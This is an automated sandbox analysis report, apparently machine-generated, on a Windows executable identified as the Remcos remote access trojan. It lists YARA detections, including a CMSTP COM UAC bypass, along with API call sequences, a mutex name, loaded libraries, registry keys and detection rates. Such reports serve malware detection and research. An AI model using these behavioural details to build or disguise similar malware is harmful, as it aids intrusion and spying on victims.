                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_0041330D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BBC6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB9A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167EF
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043706A0_2_0043706A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004140050_2_00414005
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043E11C0_2_0043E11C
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004541D90_2_004541D9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004381E80_2_004381E8
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041F18B0_2_0041F18B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004462700_2_00446270
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043E34B0_2_0043E34B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004533AB0_2_004533AB
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0042742E0_2_0042742E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004375660_2_00437566
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043E5A80_2_0043E5A8
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004387F00_2_004387F0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043797E0_2_0043797E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004339D70_2_004339D7
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0044DA490_2_0044DA49
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00427AD70_2_00427AD7
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041DBF30_2_0041DBF3
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00427C400_2_00427C40
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00437DB30_2_00437DB3
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00435EEB0_2_00435EEB
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043DEED0_2_0043DEED
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00426E9F0_2_00426E9F
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: String function: 00402093 appears 50 times
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: String function: 00401E65 appears 35 times
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: String function: 00434E70 appears 54 times
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: String function: 00434801 appears 42 times
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0041798D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F4AF
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B539
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].jsonJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-8AGIM5
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Software\0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Rmc-8AGIM50_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Rmc-8AGIM50_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: (TG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: RG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: RG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: RG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: HSG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: RG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: HSG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: RG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: licence0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: tMG0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: pd0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: Administrator0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: User0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: del0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: del0_2_0040EA00
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCommand line argument: del0_2_0040EA00
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeReversingLabs: Detection: 86%
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeVirustotal: Detection: 86%
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00457186 push ecx; ret 0_2_00457199
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00457AA8 push eax; ret 0_2_00457AC6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00434EB6 push ecx; ret 0_2_00434EC9
